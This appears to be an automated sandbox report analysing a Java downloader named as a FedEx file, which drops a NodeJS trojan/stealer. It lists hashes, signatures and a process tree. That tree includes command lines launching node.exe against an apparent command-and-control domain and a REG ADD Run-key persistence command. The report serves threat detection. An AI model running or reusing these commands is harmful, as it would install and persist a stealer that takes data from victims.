Analysis
- max time kernel: 35s
- max time network: 124s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 09-11-2020 15:49
Static task: static1
Behavioral task: behavioral1
  Sample: FEDEX1090231102994010211000.jar
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: FEDEX1090231102994010211000.jar
  Resource: win10v20201028
General
- Target: FEDEX1090231102994010211000.jar
- Size: 99KB
- MD5: 383a770e96f2d241ba6ec8622c6a15b7
- SHA1: f1778e6f8c95107fc5f75b74c591feac8e206977
- SHA256: 344e537d309f34ff04b78446d0dd2092b855181d837920a83c74a58f869a971f
- SHA512: 5c82f2e83ee6644dc3e7a5d487aef9379a0ea9104737d7529d8aa96de8eca6a3c83abcb417d977cf920c0199eb5659ba017c1c4cfa23b48060781a4835a7ea39
Malware Config
Signatures
- QNodeService
  Trojan/stealer written in NodeJS and spread via a Java downloader.
- Executes dropped EXE (3 IoCs)
  pid | Process
  4772 | node.exe
  240 | node.exe
  4504 | node.exe
- Adds Run key to start application (2 TTPs, 2 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | reg.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\88fd6069-9f79-4651-8a49-f2f6ade29902 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" | reg.exe
- JavaScript code in executable (3 IoCs)
  resource | yara_rule
  behavioral2/files/0x000100000001ab85-171.dat | js
  behavioral2/files/0x000100000001ab85-174.dat | js
  behavioral2/files/0x000100000001ab85-178.dat | js
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  22 | wtfismyip.com
  23 | wtfismyip.com
- Checks processor information in registry (2 TTPs, 6 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | node.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | node.exe
- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  pid | Process
  4772 | node.exe (4 entries)
  240 | node.exe (4 entries)
  4504 | node.exe (10 entries)
- Suspicious use of WriteProcessMemory (12 IoCs)
  description | pid | Process | procid_target
  PID 4796 wrote to memory of 652 | 4796 | java.exe | 76
  PID 4796 wrote to memory of 652 | 4796 | java.exe | 76
  PID 652 wrote to memory of 4772 | 652 | javaw.exe | 80
  PID 652 wrote to memory of 4772 | 652 | javaw.exe | 80
  PID 4772 wrote to memory of 240 | 4772 | node.exe | 82
  PID 4772 wrote to memory of 240 | 4772 | node.exe | 82
  PID 240 wrote to memory of 4504 | 240 | node.exe | 83
  PID 240 wrote to memory of 4504 | 240 | node.exe | 83
  PID 4504 wrote to memory of 1376 | 4504 | node.exe | 85
  PID 4504 wrote to memory of 1376 | 4504 | node.exe | 85
  PID 1376 wrote to memory of 2684 | 1376 | cmd.exe | 86
  PID 1376 wrote to memory of 2684 | 1376 | cmd.exe | 86
Processes
1. C:\ProgramData\Oracle\Java\javapath\java.exe
   Command line: java -jar C:\Users\Admin\AppData\Local\Temp\FEDEX1090231102994010211000.jar
   PID: 4796
   - Suspicious use of WriteProcessMemory
  2. C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
     Command line: "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\4851cf0e.tmp
     PID: 652
     - Suspicious use of WriteProcessMemory
    3. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
       Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain bawbaw.myftp.biz
       PID: 4772
       - Executes dropped EXE
       - Suspicious behavior: EnumeratesProcesses
       - Suspicious use of WriteProcessMemory
      4. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
         Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_JcIwYq\boot.js --hub-domain bawbaw.myftp.biz
         PID: 240
         - Executes dropped EXE
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of WriteProcessMemory
        5. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
           Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_JcIwYq\boot.js --hub-domain bawbaw.myftp.biz
           PID: 4504
           - Executes dropped EXE
           - Checks processor information in registry
           - Suspicious behavior: EnumeratesProcesses
           - Suspicious use of WriteProcessMemory
          6. C:\Windows\system32\cmd.exe
             Command line: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "88fd6069-9f79-4651-8a49-f2f6ade29902" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
             PID: 1376
             - Suspicious use of WriteProcessMemory
            7. C:\Windows\system32\reg.exe
               Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "88fd6069-9f79-4651-8a49-f2f6ade29902" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
               PID: 2684
               - Adds Run key to start application